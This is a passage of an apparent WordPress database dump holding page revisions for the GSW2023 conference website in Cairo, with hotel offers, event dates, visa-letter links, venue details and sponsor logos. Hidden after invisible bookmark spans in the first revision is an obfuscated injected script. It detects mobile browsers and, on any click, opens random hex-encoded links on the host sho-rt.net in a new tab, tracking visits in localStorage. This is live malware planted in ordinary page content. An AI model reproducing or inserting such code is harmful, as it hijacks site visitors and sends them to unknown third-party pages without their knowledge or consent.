NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<ul>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-09-04 10:44:50','2023-09-04 10:44:50','',3066,'https://gsw2023.com/?p=5449',0,'revision','',0),
(5451,1,'2023-09-04 10:47:02','2023-09-04 10:47:02','<p><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row]<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" 